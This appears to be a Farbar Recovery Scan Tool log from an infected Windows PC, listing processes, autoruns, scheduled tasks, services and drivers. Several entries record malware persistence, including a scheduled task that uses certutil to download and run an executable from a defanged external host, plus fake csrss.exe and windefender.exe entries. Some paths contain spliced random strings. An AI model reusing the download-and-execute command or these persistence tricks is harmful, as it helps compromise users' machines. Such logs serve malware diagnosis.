(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Atheros Communications Inc. -> Atheros Communications) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(EpicNet Inc.) [File not signed] C:\Users\Jomko\AppData\Local\Temp\csrss\cloudnet.exe
(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\stacsv64.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel Corporation -> ) C:\Windows\System32\igfxTray.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Logitech Inc -> Logitech) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\laclient.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Windows Media Audio AEC for Media Foundation) (Access Denied) C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7953576 2017-05-10] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
HKLM\...\Run: [PrintDisp] => C:\Windows\system32\PrintDisp.exe [588936 2015-08-18] (ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [976032 2011-09-16] (Atheros Communications Inc. -> Atheros Communications) [File not signed]
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [799904 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2778864 2014-08-06] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [SoftEther VPN Client UI Helper] => C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-08-27] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2109064 2019-11-27] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-11] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CCleaner Monitoring] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Policies\...\system: [disablecmd] 0
HKU\S-1-5-18\...\Run: [GarminExpress] => C:\Program Files (x86)\Garmin\Express\express.exe [30860272 2019-06-18] (Garmin International, Inc. -> Garmin Ltd. or its subsidiaries)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-23] (Google LLC -> Google LLC)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\Software\...\Authentication\Credential Provider Filters: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [159480 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SoftEther VPN Client Manager Startup.lnk [2019-05-12]
ShortcutTarget: SoftEther VPN Client Manager Startup.lnk -> C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {043F5EB4-82CE-46AA-BE56-7668C5C64C5E} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
Task: {1DE2EE32-D3F2-49E9-A9B3-B3B665DC515B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {2D417548-BA65-4EE7-8774-0A7D26D81927} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2019-06-18] (Garmin International, Inc. -> )
Task: {51CC2622-5A74-4047-8C6D-C3C3CC65EC8A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rvice.exe [335416 2020-01-21] (Adobe Inc. -> Adobe)
Task: {5C3781C4-8E63-4EE9-BD6E-23BD81C33BC9} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_321_Plugin.exe [1458232 2020-01-21] (Adobe Inc. -> Adobe)
Task: {905A300B-6470-42D2-87C0-0A406C62E55F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {973AEEE8-1D02-4786-946B-3A7611DB49FC} - System32\Tasks\HPCustPartic.exe_{497FF387-CFCE-4B3F-9361-4D1F864871FC} => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {A4CB1FE6-864E-4AC1-8079-C8F6B56E7208} - System32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => C:\Windows\system32\pcalua.exe -a "C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {DD5C372A-1601-4F80-9BD1-91EBB6A059E8} - System1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E289981D-7DE7-44EA-8295-33A39EFCC113} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E6660E0C-2898-438C-92D1-1B9BC249F29E} - System32\Tasks\HPCustParticipation HP LaserJet MFP M28-M31 => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {EC032B4F-84FF-4698-AA3E-EB8CEC1F95CE} - System32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479\{XXIL7BBA-VLUN-1SE5-VAVW-AAH7L2DBI1PZ} => C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe [0 0000-00-00] (Windows Media Audio AEC for Media Foundation) (Access Denied)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{8A644A86-7EBB-4639-9455-DF1016EC069A}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{FF69FF1A-22D7-4392-824F-9C30EFD876FD}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_241\bin\ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]

FireFox:
========
FF DefaultProfile: zzgehp0c.default-1579206376147
FF ProfilePath: C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiofiles\zzgehp0c.default-1579206376147 [2020-02-07]
FF Extension: (Adaware Secure Search) - C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\@newtab-omni.xpi [2019-10-20]
FF HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default [2020-01-26]
CHR Notifications: Default -> hxxps://www.youtube.com
CHR Extension: (Prezentácie) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-01-07]
CHR Extension: (SEOquake) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2020-01-08]
CHR Extension: (Dokumenty) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-08]
CHR Extension: (Disk Google) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-01-08]
CHR Extension: (YouTube) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-01-08]
CHR Extension: (Tabuľky) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-01-07]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-01-26]
CHR Extension: (Tag Assistant (by Google)) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2019-05-08]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-08]
CHR Extension: (Gmail) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-08]
CHR Extension: (Chrome Media Router) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-01-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx <not found>

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-08-26] (Apple Inc. -> Apple Inc.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [105120 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
R2 ibtsiva; C:\Windows\system32\ibtsiva.exe [184072 2017-01-13] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [359680 2019-07-12] (Intel Corporation -> Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268968 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> )
R2 SEVPNCLIENT; C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [339456 2013-08-16] (IDT, Inc.) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2017-01-08] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [2079744 2020-02-07] () [File not signed]
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3758760 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> Intel® Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\MobileGo\DriverInstall.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 amdhub30; C:\Windows\system32\drivers\amdhub30.sys [108768 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdhub31; C:\Windows\system32\drivers\amdhub31.sys [141528 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 amdxhc; C:\Windows\system32\drivers\amdxhc.sys [229088 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdxhc31; C:\Windows\system32\drivers\amdxhc31.sys [440536 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 ampa; C:\Windows\system32\ampa.sys [38320 2016-12-25] (CHENGDU AOMEI Tech Co., Ltd. -> )
R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [118184 2018-05-14] (Alcorlink Corp. -> )
R3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [101352 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [158696 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1560552 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 EtronHub3; C:\Windows\System32\Drivers\EtronHub3.sys [65408 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronSTOR; C:\Windows\System32\Drivers\EtronSTOR.sys [39296 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronXHCI; C:\Windows\System32\Drivers\EtronXHCI.sys [94208 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 FLxHCIh; C:\Windows\system32\drivers\FLxHCIh.sys [88016 2016-12-09] (Fresco Logic Inc -> Fresco Logic)
S3 IaNVMe; C:\Windows\system32\drivers\IaNVMe.sys [113160 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
R0 IaNVMeF; C:\Windows\System32\drivers\IaNVMeF.sys [35848 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
S3 IaRNVMe; C:\Windows\system32\drivers\IaRNVMe.sys [592408 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R0 IaRNVMeF; C:\Windows\System32\drivers\IaRNVMeF.sys [36888 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [206344 2017-06-27] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
R3 L1C; C:\Windows\System32\DRIVERS\L1C63x64.sys [125048 2016-01-29] (Rivet Networks LLC -> Qualcomm Atheros, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [199760 2016-11-29] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-12-24] (Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor, Inc.)
R3 Neo_VPN; C:\Windows\System32\DRIVERS\Neo_0061.sys [38088 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3427848 2017-11-08] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
S3 ocznvme; C:\Windows\system32\drivers\ocznvme.sys [99592 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
R0 ocztrimfilter; C:\Windows\System32\drivers\ocztrimfilter.sys [29064 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
S3 rusb3hub; C:\Windows\system32\drivers\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
S3 rusb3xhc; C:\Windows\system32\drivers\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
R3 SEE; C:\Windows\System32\drivers\see.sys [49864 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [41512 2017-12-07] (Intel Corporation -> )
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [33008 2013-05-02] (Synaptics Incorporated -> Synaptics Incorporated)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 STHDA; C:\Windows\System32\DRIVERS\stwrt64.sys [551936 2013-08-16] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
S3 tilfilter; C:\Windows\system32\drivers\TIxHCIlfilter.sys [17672 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 tiufilter; C:\Windows\system32\drivers\TIxHCIufilter.sys [23304 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-02-01] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 VUSB3HUB; C:\Windows\system32\drivers\ViaHub3.sys [221696 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 xhcdrv; C:\Windows\system32\drivers\xhcdrv.sys [294912 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-02-07 20:46 - 2020-02-07 20:46 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\EpicNet Inc
2020-02-07 20:45 - 2020-02-07 20:45 - 002079744 ____H C:\Windows\windefender.exe
2020-02-07 20:45 - 2020-02-07 20:45 - 000003490 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-02-07 20:44 - 2020-02-07 20:44 - 000000000 ___RD C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiStart Menu\Programs\BT Devices
2020-02-07 20:40 - 2020-02-07 20:19 - 008356016 _____ (Malwarebytes) C:\Users\Jomko\Desktop\adwcleaner_8.0.2.exe
2020-02-06 21:29 - 2020-02-06 21:30 - 000047825 _____ C:\Users\Jomko\Desktop\Addition.txt
2020-02-06 21:28 - 2020-02-07 20:56 - 000027126 _____ C:\Users\Jomko\Desktop\FRST.txt
2020-02-06 21:27 - 2020-02-06 21:23 - 002279424 _____ (Farbar) C:\Users\Jomko\Desktop\FRST64.exe
2020-02-06 21:24 - 2020-02-07 20:55 - 000000000 ____D C:\FRST
2020-01-26 19:07 - 2020-01-26 19:07 - 000077280 _____ (Bitvise Limited) C:\Windows\system32\BvEventSource.exe
2020-01-26 19:07 - 2020-01-26 19:07 - 000076336 _____ (Bitvise Limited) C:\Windows\MstscTitle64.dll
